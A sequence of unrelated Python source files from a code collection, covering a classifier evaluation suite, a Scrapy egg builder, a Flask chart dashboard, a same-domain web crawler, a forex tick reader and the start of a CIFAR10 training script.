{}.\".format(\r\n len(test_data.loc[test_data[\"is_SE\"] > 0])))\r\n #logging.info(\"Number of data flipped due to self angry: {}.\".format(\r\n # len(test_data.loc[test_data[\"self_angry\"] == \"self\"])))\r\n except:\r\n pass\r\n\r\n [recall, precision, fpr, tpr, cur_auc, best_thres, best_f1, cur_pr_auc] = self.get_all_curves(\r\n test_data[\"label\"],\r\n test_data[\"prediction\"].tolist(),\r\n fid,\r\n \"after SE adjustment comment-level\",\r\n out_f)\r\n if i == 0: # first trial\r\n ax_c_pr.plot(recall, precision, color=color, linewidth=0.5, \r\n label=feature_names[fid]+\" comment-level\")\r\n ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" comment-level\")\r\n else:\r\n ax_c_pr.plot(recall, precision, color=color, linewidth=0.5)\r\n ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5)\r\n auc_comment_scores.append(cur_auc)\r\n test_comment_scores.append(best_f1)\r\n pr_auc_comment_scores.append(cur_pr_auc)\r\n\r\n else: # LOGS_BASED\r\n # find the thres that yields the best F1 score to assign comments to a\r\n # class\r\n precision, recall, thresholds = precision_recall_curve(\r\n test_data[\"thread_label\"], \r\n test_data[\"raw_prediction\"])\r\n\r\n f1_scores = 2*recall*precision/(recall+precision)\r\n best_thres = thresholds[np.argmax(f1_scores)]\r\n test_data[\"prediction\"] = test_data[\"raw_prediction\"]#.map(lambda x:x>=best_thres)\r\n\r\n # these two should be the same, just as a sanity check\r\n test_comment_scores.append(max(f1_scores))\r\n test_thread_scores.append(f1_score(\r\n test_data[\"thread_label\"],\r\n test_data[\"prediction\"].map(lambda x:x>=best_thres)))\r\n\r\n [recall, precision, fpr, tpr, cur_auc, _, _, cur_pr_auc] = self.get_all_curves(\r\n test_data[\"thread_label\"],\r\n test_data[\"prediction\"],\r\n fid,\r\n \"Logs-based thread-level\",\r\n out_f)\r\n auc_comment_scores.append(cur_auc)\r\n auc_thread_scores.append(cur_auc)\r\n pr_auc_comment_scores.append(cur_pr_auc)\r\n pr_auc_thread_scores.append(cur_pr_auc)\r\n all_fprs.append(list(fpr))\r\n all_tprs.append(list(tpr))\r\n all_ps.append(list(precision))\r\n all_rs.append(list(recall))\r\n\r\n if i == 0: # first trial\r\n ax_c_pr.plot(recall, precision, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n ax_pr.plot(recall, precision, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n ax_roc.plot(fpr, tpr, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n else:\r\n ax_c_pr.plot(recall, precision, color=color, linewidth=0.5)\r\n ax_pr.plot(recall, precision, color=color, linewidth=0.5)\r\n ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5)\r\n ax_roc.plot(fpr, tpr, color=color, linewidth=0.5)\r\n\r\n ax_roc.legend()\r\n ax_c_roc.legend()\r\n ax_c_pr.legend()\r\n ax_pr.legend()\r\n fig.savefig(\"G_ROC_threads_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n fig_roc.savefig(\"G_ROC_comments_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n fig_pr.savefig(\"G_PR_threads_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n fig_c_pr.savefig(\"G_PR_comments_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n\r\n # use the best combination of hyperparameters\r\n clf = RandomForestClassifier(\r\n n_estimators = best_parameters[\"n_estimators\"],\r\n max_depth = best_parameters[\"max_depth\"],\r\n max_features = best_parameters[\"max_features\"]\r\n )\r\n clf.fit(X_train, y_train)\r\n self.model = clf\r\n logging.info(\"importance on train set\\n\")\r\n logging.info(\"For plotting feature importance\")\r\n fea_importance = clf.feature_importances_\r\n for col_ind, coll in enumerate(X_train.columns):\r\n logging.info(\"{},{}\".format(coll, fea_importance[col_ind]))\r\n\r\n # save the model\r\n model_out = open(\r\n \"src/pickles/{}_model_1.p\".format(model_name.upper()),\r\n \"wb\")\r\n pickle.dump(clf, model_out)\r\n model_out.close()\r\n logging.info(\"Model is stored at {}.\".format(\r\n str(pathlib.Path(__file__).parent.name) + \"/src/pickles/\"))\r\n\r\n logging.info(\"Feature set {}: score: {}\".format(fid, train_scores))\r\n logging.info(\"train scores: {}\".format(str(train_scores)))\r\n logging.info(\"test scores: {}\".format(str(test_comment_scores)))\r\n logging.info(\"test thread scores: {}\".format(str(test_thread_scores)))\r\n logging.info(\"test AUC comment scores: {}\".format(\r\n str(auc_comment_scores)))\r\n logging.info(\"test AUC thread scores: {}\".format(\r\n str(auc_thread_scores)))\r\n logging.info(\"test PR AUC comment scores: {}\".format(\r\n str(pr_auc_comment_scores)))\r\n logging.info(\"test PR AUC thread scores: {}\".format(\r\n str(pr_auc_thread_scores)))\r\n logging.info(\"test AUC thread scores: {}\".format(\r\n str(auc_thread_scores)))\r\n\r\n logging.info(\"END CLASSIFIER {}\\n\\n\\n\".format(feature_names[fid]))\r\n\r\n # save the ROC curve\r\n #ax.legend()\r\n #ax_c.legend()\r\n #fig.savefig(\"G_precision-recall_curve_\"+str(fid)+\".pdf\")\r\n out_f.write(\"{} all fprs:{}\\n\".format(feature_names[fid], all_fprs))\r\n out_f.write(\"{} all tprs:{}\\n\".format(feature_names[fid], all_tprs))\r\n out_f.write(\"{} all ps:{}\\n\".format(feature_names[fid], all_ps))\r\n out_f.write(\"{} all rs:{}\\n\".format(feature_names[fid], all_rs))\r\n\r\n out_f.close()\r\n return [train_scores, test_comment_scores, test_thread_scores,\r\n auc_comment_scores, auc_thread_scores]\r\n\r\n\r\n def get_all_curves(self, y_true, y_pred, fid, stage, out_f): \r\n precision, recall, thresholds = precision_recall_curve(\r\n y_true, \r\n y_pred)\r\n logging.info(feature_names[fid])\r\n # use the raw prediction to get a F1 score\r\n f1_scores = 2*recall*precision/(recall+precision)\r\n best_thres_ind = np.argmax(f1_scores)\r\n best_thres = thresholds[best_thres_ind]\r\n out_f.write(\"\\n{}, \\nP:{}, \\nR:{}, \\nT:{}\\n\".format(\r\n stage,\r\n \",\".join([str(p) for p in precision]),\r\n \",\".join([str(p) for p in recall]),\r\n \",\".join([str(p) for p in thresholds])))\r\n out_f.write(\"{}, AUC PR curves:{}\\n\".format(\r\n stage,\r\n str(auc(recall, precision))))\r\n out_f.write(\"best thres:{}, \\nF1s: {} \\jbest F1:{}\\n\".format(\r\n best_thres,\r\n \",\".join([str(f) for f in f1_scores]),\r\n max(f1_scores)))\r\n\r\n [fpr, tpr, thresholds_tf] = roc_curve(\r\n y_true,\r\n y_pred)\r\n out_f.write(\"\\n{}: \\nfpr:{}\\ntpr:{}\\nT:{}\\n\".format(\r\n stage,\r\n str(fpr),\r\n str(tpr),\r\n str(thresholds_tf)))\r\n\r\n cur_auc = roc_auc_score(\r\n y_true,\r\n y_pred)\r\n out_f.write(\"ROC AUC {}: {}\".format(stage, str(cur_auc)))\r\n\r\n out_f.write(\r\n \"tprs: {}\\nfprs: {}\\nthresholds: {}\".format(str(tpr), str(fpr),\r\n str(thresholds_tf)))\r\n return [recall, precision, fpr, tpr, cur_auc, best_thres, max(f1_scores),\r\n auc(recall, precision)]\r\n\r\n\r\n # applying the model to the test data\r\n def test_issue_classifications_from_comments_all(self, matched_pairs=False):\r\n X_test = self.test_data[self.features]\r\n\r\n self.test_data[\"raw_prediction\"] = self.model.predict(X_test)\r\n self.test_data[\"prediction\"] = self.test_data[\"raw_prediction\"]\r\n #if \"perspective_score\" in self.features:\r\n #self.test_data = self.remove_I(self.test_data)\r\n #self.test_data = self.remove_SE(self.test_data, self.model)\r\n return self.test_data\r\n","sub_path":"src/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":31528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"92631813","text":"#! /usr/bin/env python\n#-*-coding:utf-8 -*-\n\nimport glob\nimport os\nimport time\nimport shutil\nimport sys\nimport tempfile\nimport redis\nimport json\nimport logging\nfrom os.path import join\nfrom subprocess import check_call\n\nimport configparser\nfrom common.FormatStr import dictRemoveNone\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom scrapy.utils.python import retry_on_eintr\nfrom common.OperationOfDB import executeTheSQLStatement\nfrom models.Boss.Area import Area as DataArea, tableChangeDic\nfrom models.Boss.SpiderScriptNode import SpiderScriptNode, tableChangeDic\nfrom models.Boss.SpiderSchedule import SpiderSchedule,tableChangeDic\nfrom models.Boss.SpiderScript import SpiderScript, tableChangeDic\nfrom models.Boss.SpiderScriptSchedule import SpiderScriptSchedule, tableChangeDic\nfrom models.Boss.SpiderSchedule import SpiderSchedule\nfrom config import PROJECTS_FOLDER,redisHost,redisPort,redisTaskDb\nfrom apscheduler.jobstores.redis import RedisJobStore\nfrom apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\n\njobstores = {\n 'redis': RedisJobStore(host=redisHost,port=redisPort,db=redisTaskDb)\n}\nexecutors = {\n 'default': ThreadPoolExecutor(10),#默认线程数\n 'processpool': ProcessPoolExecutor(3)#默认进程\n}\n\nschedul = BackgroundScheduler(jobstores=jobstores, executors=executors)\n\n\ndef scrapyd_url(ip, port):\n \"\"\"\n get scrapyd url\n :param ip: host\n :param port: port\n :return: string\n \"\"\"\n url = 'http://{ip}:{port}'.format(ip=ip, port=port)\n return url\n\n\ndef log_url(ip, port, project, spider, job):\n \"\"\"\n get log url\n :param ip: host\n :param port: port\n :param project: project\n :param spider: spider\n :param job: job\n :return: string\n \"\"\"\n url = 'http://{ip}:{port}/logs/{project}/{spider}/{job}.log'.format(ip=ip, port=port, project=project,\n spider=spider, job=job)\n return url\n\n\n\ndef config(path, section, option, name='scrapy.cfg', default=None):\n try:\n cf = configparser.ConfigParser()\n cfg_path = join(path, name)\n cf.read(cfg_path)\n return cf.get(section, option)\n except configparser.NoOptionError:\n return default\n\n\ndef build_project(project):\n egg = build_egg(project)\n print('Built %(project)s into %(egg)s' % {'egg': egg, 'project': project})\n return egg\n\n\n_SETUP_PY_TEMPLATE = \\\n \"\"\"# Automatically created by: gerapy\nfrom setuptools import setup, find_packages\nsetup(\n name='%(project)s',\n version='1.0',\n packages=find_packages(),\n entry_points={'scrapy':['settings=%(settings)s']},\n)\"\"\"\n\n\n\n# 构建Egg\ndef build_egg(project):\n work_path = os.getcwd()\n try:\n path = os.path.abspath(join(os.getcwd(), PROJECTS_FOLDER))\n project_path = join(path, project)\n os.chdir(project_path)\n settings = config(project_path, 'settings', 'default')\n create_default_setup_py(project_path, settings=settings, project=project)\n d = tempfile.mkdtemp(prefix=\"zzh-\")\n o = open(os.path.join(d, \"stdout\"), \"wb\")\n e = open(os.path.join(d, \"stderr\"), \"wb\")\n retry_on_eintr(check_call, [sys.executable, 'setup.py', 'clean', '-a', 'bdist_egg', '-d', d],\n stdout=o, stderr=e)\n o.close()\n e.close()\n egg = glob.glob(os.path.join(d, '*.egg'))[0]\n # Delete Origin file\n if find_egg(project_path):\n os.remove(join(project_path, find_egg(project_path)))\n shutil.move(egg, project_path)\n return join(project_path, find_egg(project_path))\n except Exception as e:\n print(e.args)\n finally:\n os.chdir(work_path)\n\n\ndef find_egg(path):\n items = os.listdir(path)\n for name in items:\n if name.endswith(\".egg\"):\n return name\n return None\n\n\ndef create_default_setup_py(path, **kwargs):\n with open(join(path, 'setup.py'), 'w') as f:\n print(kwargs)\n file = _SETUP_PY_TEMPLATE % kwargs\n f.write(file)\n f.close()\n\n\n","sub_path":"boss_service/common/SpiderUtils.py","file_name":"SpiderUtils.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336389023","text":"import os\n\nfrom paddlehub import Module\nfrom paddlehub.module.module import moduleinfo, serving\n\nfrom UGATIT_83w.model import Model\nfrom UGATIT_83w.processor import base64_to_cv2, cv2_to_base64, Processor\n\n\n@moduleinfo(\n name=\"UGATIT_83w\", # 模型名称\n type=\"CV/style_transfer\", # 模型类型\n author=\"jm12138\", # 作者名称\n author_email=\"jm12138@qq.com\", # 作者邮箱\n summary=\"UGATIT\", # 模型介绍\n version=\"1.0.1\" # 版本号\n)\nclass UGATIT_83w(Module):\n # 初始化函数\n def __init__(self, name=None, use_gpu=False):\n # 设置模型路径\n self.model_path = os.path.join(self.directory, \"UGATIT_83w\")\n\n # 加载模型\n self.model = Model(modelpath=self.model_path, use_gpu=use_gpu, use_mkldnn=False, combined=False)\n\n # 关键点检测函数\n def style_transfer(self, images=None, paths=None, batch_size=1, output_dir='output', visualization=False):\n # 加载数据处理器\n processor = Processor(images, paths, output_dir, batch_size)\n\n # 模型预测\n outputs = self.model.predict(processor.input_datas)\n\n # 结果后处理\n results = processor.postprocess(outputs, visualization)\n\n # 返回结果\n return results\n\n # Hub Serving\n @serving\n def serving_method(self, images, **kwargs):\n # 获取输入数据\n images_decode = [base64_to_cv2(image) for image in images]\n\n # 图片风格转换\n results = self.style_transfer(images_decode, **kwargs)\n\n # 对输出图片进行编码\n encodes = []\n for result in results:\n encode = cv2_to_base64(result)\n encodes.append(encode)\n\n # 返回结果\n return encodes\n","sub_path":"modules/image/Image_gan/style_transfer/UGATIT_83w/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491261598","text":"from flask import Flask, jsonify, request\nfrom flask import render_template\nimport ast\n\napp = Flask(__name__)\n\nlabels0 = []\nvalues0 = []\nlabels1 = []\nvalues1 = []\nlabels2 = []\nvalues2_1 = []\nvalues2_2 = []\nlabels3 = []\nvalues3 = []\nlabels4 = []\nvalues4 = []\nlabels5 = []\nvalues5 = []\n\n\n@app.route(\"/\")\ndef get_chart_page():\n global labels0, values0, labels1, values1, labels2, values2_1, values2_2, \\\n labels3, values3, labels4, values4, labels5, values5\n labels0 = []\n values0 = []\n labels1 = []\n values1 = []\n labels2 = []\n values2_1 = []\n values2_2 = []\n labels3 = []\n values3 = []\n labels4 = []\n values4 = []\n labels5 = []\n values5 = []\n return render_template('index.html',\n labels0=labels0, values0=values0,\n labels1=labels1, values1=values1,\n labels2=labels2,\n values2_1=values2_1, values2_2=values2_2,\n labels3=labels3, values3=values3,\n labels4=labels4, values4=values4,\n labels5=labels5, values5=values5)\n\n\n@app.route('/refreshData')\ndef refresh_graph_data():\n global labels0, values0, labels1, values1, labels2, values2_1, values2_2, \\\n labels3, values3, labels4, values4, labels5, values5\n print(\"Labels0 now: \" + str(labels0))\n print(\"Values0 now: \" + str(values0))\n print(\"Labels1 now: \" + str(labels1))\n print(\"Values1 now: \" + str(values1))\n print(\"Labels2 now: \" + str(labels2))\n print(\"Values2_1 now: \" + str(values2_1))\n print(\"Values2_2 now: \" + str(values2_2))\n print(\"Labels3 now: \" + str(labels3))\n print(\"Values3 now: \" + str(values3))\n print(\"Labels4 now: \" + str(labels4))\n print(\"Values4 now: \" + str(values4))\n print(\"Labels5 now: \" + str(labels5))\n print(\"Values5 now: \" + str(values5))\n return jsonify(labels0=labels0, values0=values0,\n labels1=labels1, values1=values1,\n labels2=labels2,\n values2_1=values2_1, values2_2=values2_2,\n labels3=labels3, values3=values3,\n labels4=labels4, values4=values4,\n labels5=labels5, values5=values5)\n\n\n@app.route('/updateData', methods=['POST'])\ndef update_data():\n global labels0, values0, labels1, values1, labels2, values2_1, values2_2, \\\n labels3, values3, labels4, values4, labels5, values5\n if 'values0' in str(request.form):\n labels0 = ast.literal_eval(request.form['labels0'])\n values0 = ast.literal_eval(request.form['values0'])\n if 'values1' in str(request.form):\n labels1 = ast.literal_eval(request.form['labels1'])\n values1 = ast.literal_eval(request.form['values1'])\n elif 'values2_1' in str(request.form):\n labels2 = ast.literal_eval(request.form['labels2'])\n values2_1 = ast.literal_eval(request.form['values2_1'])\n elif 'values2_2' in str(request.form):\n labels2 = ast.literal_eval(request.form['labels2'])\n values2_2 = ast.literal_eval(request.form['values2_2'])\n elif 'values3' in str(request.form):\n labels3 = ast.literal_eval(request.form['labels3'])\n values3 = ast.literal_eval(request.form['values3'])\n elif 'values4' in str(request.form):\n labels4 = ast.literal_eval(request.form['labels4'])\n values4 = ast.literal_eval(request.form['values4'])\n elif 'values5' in str(request.form):\n labels5 = ast.literal_eval(request.form['labels5'])\n values5 = ast.literal_eval(request.form['values5'])\n else:\n return \"error\", 400\n print(\"Labels0 Received: \" + str(labels0))\n print(\"Values0 Received: \" + str(values0))\n print(\"Labels1 Received: \" + str(labels1))\n print(\"Values1 Received: \" + str(values1))\n print(\"Labels2 Received: \" + str(labels2))\n print(\"Values2_1 Received: \" + str(values2_1))\n print(\"Values2_2 Received: \" + str(values2_2))\n print(\"Labels3 Received: \" + str(labels3))\n print(\"Values3 Received: \" + str(values3))\n print(\"Labels4 Received: \" + str(labels4))\n print(\"Values4 Received: \" + str(values4))\n print(\"Labels5 Received: \" + str(labels5))\n print(\"Values5 Received: \" + str(values5))\n return \"success\", 201\n\n\nif __name__ == \"__main__\":\n app.run(host='localhost', port=5001)\n","sub_path":"dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449737353","text":"#! /usr/bin/env python\n#coding: utf-8\n\nimport re\nimport optparse\nimport sqlite3\nimport socket\nimport logging\nimport urllib2, urlparse\nfrom Queue import Queue, Empty\nfrom threading import Thread, Lock\nfrom httplib import BadStatusLine\nfrom bs4 import BeautifulSoup\n\nvisited_links = []\nqueue = Queue()\ndb_queue = Queue()\n\ndef fetchPage(deep, url, log):\n '''抓取传入的URL的HTML源码 '''\n if not url.startswith('http://') and not url.startswith('https://'):\n url = 'http://'+url\n\n log.info(u\"获取HTML源码: (%d)%s\" % (deep, url))\n headers = {\n 'Referer':'http://www.cnbeta.com/articles',\n 'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'\n }\n log.debug(u'设定请求头部: (%d)%s' %(deep, url))\n req = urllib2.Request(url, headers = headers)\n\n log.debug(u'下载页面: (%d)%s' %(deep, url))\n try:\n response = urllib2.urlopen(req, timeout=20)\n except urllib2.URLError as e:\n if hasattr(e, 'reason'):\n log.error(\"We failed to reach: (%d)%s \\n Reason: %s\" %(deep, url, e.reason))\n elif hasattr(e, 'code'):\n log.error(\"Couldn't fulfill the request: (%d)%s\\n Error code: %s\" %(deep, url, e.code))\n except BadStatusLine:\n log.warn(\"Could not fetch: (%d)%s\" %(deep, url))\n except UnicodeError:\n log.error(\"UnicodeError: (%d)%s\" %(deep, url))\n #queue.put((deep, url.encode('raw_unicode_escape')))\n except Exception:\n pass\n else:\n log.debug(u'获取源码成功: (%d)%s' %(deep, url))\n\n try:\n return response.read()\n except urllib2.socket.timeout:\n log.error('Timeout: %s' %url)\n return ''\n\n\n\ndef processHtml(response, options_url, url, log):\n '''处理获取的HTML源码,从中过滤出和需爬去域名的相同域的链接'''\n links = []\n real_link = []\n same_site = []\n try:\n html = BeautifulSoup(response, 'lxml')\n except TypeError:\n html = BeautifulSoup(str(response), 'lxml')\n\n log.debug(u'从源码中过滤出标签: %s' %url)\n for a in html.find_all(\"a\"):\n try:\n links.append(a[\"href\"])\n except Exception:\n continue\n log.debug(u'过滤完毕: %s' %url)\n\n #检测是否为URL\n for i in set(links):\n log.debug(u'检测是否为URL: %s' %i)\n if i.startswith('http') or i.startswith('?') or i.startswith('/'): #判断是否是正确的URL\n if not i.startswith('http'): #如果是相对地址则转换成绝对地址\n if not i.startswith('/'):\n i = '/'+i\n absolute_path = urlparse.urljoin(url, i)\n i = absolute_path\n log.debug(u'转换为绝对地址: %s' %i)\n if i in visited_links: #检查是否是已爬取的URL\n log.debug(u'已访问过此网址: %s' %i)\n continue\n log.debug(u'为合法URL: %s' %i)\n real_link.append(i)\n else:\n log.debug(u'为非法URL: %s' %i)\n\n #检测URL是否和输入的URl为同一域\n for u in real_link:\n #将URL的域名部分以\".\"分割,转换为列表\n log.debug(u'检测是否为同一域: %s' %u)\n separate_input_url = (urlparse.urlparse(options_url).netloc).split(\".\")\n separate_url = (urlparse.urlparse(u).netloc).split(\".\")\n\n si = len(separate_input_url) - 1\n su = len(separate_url) - 1\n\n #对比列表,如果相同则为同一域的域名\n while((separate_url[su]).lower() == (separate_input_url[si]).lower()):\n if (si == 1):\n separate_input_url[0] == \"www\"\n same_site.append(u)\n log.debug(u'和所爬取的URL为同一域: %s' %u)\n break\n if (si == 0):\n same_site.append(u)\n log.debug(u'和所爬取的URL为同一域: %s' %u)\n break\n si = si - 1\n su = su - 1\n visited_links.extend(same_site)\n\n return same_site\n\n\ndef save2Db(options_deep, options_dbfile, log):\n '''将传入的URL和深度存入指定数据库‘'''\n log.debug(u'连接数据库')\n with sqlite3.connect(options_dbfile, isolation_level=None, check_same_thread=False) as connect_db:\n db = connect_db.cursor()\n log.debug(u'连接数据库成功')\n log.debug(u'建立表格')\n try:\n db.execute(\"CREATE TABLE links(hierarchy INTEGER, URL TEXT)\")\n except sqlite3.OperationalError:\n log.debug(u'存在已建立的表格')\n else:\n log.debug(u'表格建立成功')\n\n while True:\n try:\n (deep, url) = db_queue.get(True, 30)\n except Empty:\n log.debug('Dbqueue is Empty')\n break\n except Exception as err:\n log.debug('DB: Exception %s' %err)\n continue\n else:\n if deep <= (options_deep+1):\n log.debug(u'存入%s' %url)\n try:\n db.execute(\"INSERT INTO links (hierarchy, URL) VALUES(?, ?)\",(int(deep), url))\n except Exception:\n pass\n log.debug(u'存入成功: %s' %url)\n print(deep, url)\n db_queue.task_done()\n else:\n break\n\n\n\ndef checkKeyword(options_keyword, req):\n '''检查是否需要查找关键字,如果需要则搜索'''\n if options_keyword == \"\":\n return True\n else:\n if req.find(options_keyword) != -1:\n return True\n else:\n return False\n\n\ndef logSet(log_level):\n '''设置日志记录等级'''\n levels = {1:logging.DEBUG,\n 2:logging.INFO,\n 3:logging.WARNING,\n 4:logging.ERROR,\n 5:logging.CRITICAL}\n\n log = logging.getLogger('creepsmonkey')\n log.setLevel(levels.get(log_level, \"logging.WARNING\"))\n fh = logging.FileHandler(\"log\", mode='w', encoding='UTF-8')\n formatter = logging.Formatter(\"%(levelname)s - %(asctime)s - %(message)s\")\n fh.setFormatter(formatter)\n log.addHandler(fh)\n\n return log\n\n\ndef getUrl(options_url, options_keyword, options_deep, log):\n while True:\n try:\n (deep, url) = queue.get(True, 30)\n except Empty:\n log.debug('queue is Empty')\n break\n except Exception:\n continue\n else:\n if deep <= options_deep: #判断是否达到需爬需层级数\n response = fetchPage(deep, url, log)\n\n if checkKeyword(options_keyword, response):\n log.debug(u'解析HTML源码: %s' %url)\n urls = processHtml(response, options_url, url, log)\n\n for i in urls: #将爬出的URL加进列队\n if deep < options_deep:\n queue.put((deep+1, i))\n db_queue.put((deep+1, i))\n queue.task_done()\n\n\nif __name__ == \"__main__\":\n option = optparse.OptionParser()\n option.add_option(\"-u\", \"--url\", dest=\"url\", default=\"http://www.baidu.com\", type=\"string\", help=u\"所需爬取的URL\")\n option.add_option(\"-d\", \"--deep\", dest=\"deep\", default=0, type=\"int\", help=u\"所需爬取的深度\")\n option.add_option(\"-t\", \"--threadpool\", dest=\"threadpool\", default=10, type=\"int\", help=u\"所需的线程的线程数\")\n option.add_option(\"-f\", \"--dbfile\", dest=\"dbfile\", default=\"dbfile\", type=\"string\", help=u\"指定数据库名\")\n option.add_option(\"-k\", \"--keyword\", dest=\"keyword\", default=\"\", type=\"string\", help=u\"指定页面需包含的关键字\")\n option.add_option(\"-l\", \"--loglevel\", dest=\"loglevel\", default=\"1\", type=\"int\", help=u\"设置日志记录等级,1-5,数字越大越详细\")\n (options, args) = option.parse_args()\n\n log = logSet(options.loglevel)\n queue.put((-1, options.url))\n visited_links.append(options.url)\n\n for i in range(options.threadpool):\n t = Thread(target=getUrl, args=(options.url, options.keyword, options.deep, log))\n t.daemon = True\n t.start()\n log.debug(u'开始爬取')\n\n for u in range(options.threadpool):\n tdb = Thread(target=save2Db, args=(options.deep, options.dbfile, log))\n tdb.daemon = True\n tdb.start()\n\n queue.join()\n db_queue.join()\n\n log.info(u'共爬取Link: %s个' %len(visited_links))\n","sub_path":"creepsmonkey.py","file_name":"creepsmonkey.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"216317856","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\n__author__ = 'jonepol'\n\n\n#lit les fichiers ihsda et en fait des tranches de 10 secondes (ou 1 minute)\n#lus sur histdata.com\n#ouvre le zip\n#fait une moyenne sur timebin secondes timebin =10\n#calcule qq parametres temporels style bollinger, etc.\n\n\nchemin =\"c:\\\\essais\\\\hisdata\"\n\n#lire un zip\nimport zipfile\nimport csv\nimport io\n\ndef scanzip(paire,annee, mois):\n nomfich = \"c:\\\\essais\\\\hisdata\"+\"\\\\\"+\"HISTDATA_COM_ASCII_EURUSD_T201606\"+\".zip\"\n lezip = zipfile.ZipFile(nomfich)\n lecsv = lezip.open(\"DAT_ASCII_EURUSD_T_201606.csv\",\"rU\")\n\n lecsv_file = io.TextIOWrapper(lecsv)\n\n reader = csv.reader(lecsv_file, delimiter=',')\n for row in reader: #chaque ligne est un tple\n annee = int(row[0][0:4])\n mois = int(row[0][4:6])\n jour = int(row[0][6:8])\n heure = int(row[0][9:11])\n minute = int(row[0][11:13])\n seconde = int(row[0][13:15])\n milli = int(row[0][15:])\n nb1 = float(row[1])\n nb2 = float(row[2])\n #check : c'est bon ca importe bien\n #print(annee,mois,jour,heure,minute,seconde,milli,nb1,nb2)\n\n\n #print data\n\n #for line in lecsv:\n # print(line)\n\n\n\nscanzip(\"EURUSD\",2016,5)","sub_path":"readtick_hisdata.py","file_name":"readtick_hisdata.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"114361079","text":"\"\"\"\nhydraulic network\n\"\"\"\n\n\nfrom __future__ import division\n\n__author__ = \"Thuy-An Nguyen\"\n__copyright__ = \"Copyright 2015, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Thuy-An Nguyen\", \"Tim Vollrath\", \"Jimeno A. Fonseca\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\n\n\n# investment and maintenance costs\n\ndef calc_Cinv_network_linear(LengthNetwork, gV):\n \"\"\"\n calculate annualised network investment cost with a linearized function.\n\n :param LengthNetwork: total length of the network in [m]\n :pram gV: globalvar.py\n\n :returns InvCa: annualised investment cost of the thermal network\n :rtype InvCa: float\n\n \"\"\"\n\n InvC = 0\n InvC = LengthNetwork * gV.PipeCostPerMeterInv\n InvCa = InvC * gV.PipeInterestRate * (1+ gV.PipeInterestRate) ** gV.PipeLifeTime / ((1+gV.PipeInterestRate) ** gV.PipeLifeTime - 1)\n\n return InvCa\n\n","sub_path":"cea/technologies/heating_network/thermal_network.py","file_name":"thermal_network.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"610360670","text":"\n\n#calss header\nclass _EJECT():\n\tdef __init__(self,): \n\t\tself.name = \"EJECT\"\n\t\tself.definitions = [u'to force someone to leave a particular place: ', u'to order a sports player to leave the playing area during a game because they have broken a rule', u'to leave an aircraft in an emergency using an ejection seat', u'to come out of a machine when a button is pressed, or to make something do this: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_eject.py","file_name":"_eject.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573616201","text":"import argparse\n\nfrom horch.core.catalog.helper import get_optimizer, get_lr_scheduler, get_dataloader, get_model\n\nimport torch\nimport torch.nn as nn\nfrom torchvision.datasets import CIFAR10\n\nfrom horch.core import load_yaml_config\nfrom horch.config import cfg as global_cfg, load_from_dict\nfrom horch.datasets import train_test_split\nfrom horch.nn.loss import CrossEntropyLoss\nfrom horch.train import manual_seed\nfrom horch.train.classification.mix import get_mix\nfrom horch.train.classification.trainer import Trainer\nfrom horch.train.metrics import TrainLoss, Loss\nfrom horch.train.metrics.classification import Accuracy\n\nimport horch.models.cifar\n\nfrom torchvision.transforms import Compose\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Train CIFAR10.')\n parser.add_argument('-c', '--config', help='config file')\n parser.add_argument('-r', '--resume', help='resume from checkpoints')\n args = parser.parse_args()\n\n cfg = load_yaml_config(args.config)\n\n if cfg.get(\"Global\"):\n global_cfg.merge_from_other_cfg(load_from_dict(cfg.get(\"Global\")))\n\n manual_seed(cfg.seed)\n\n if cfg.get(\"benchmark\"):\n torch.backends.cudnn.benchmark = True\n\n train_transform = Compose(cfg.Dataset.Train.transforms)\n test_transform = Compose(cfg.Dataset.Test.transforms)\n\n data_home = cfg.Dataset.data_home\n ds_train = 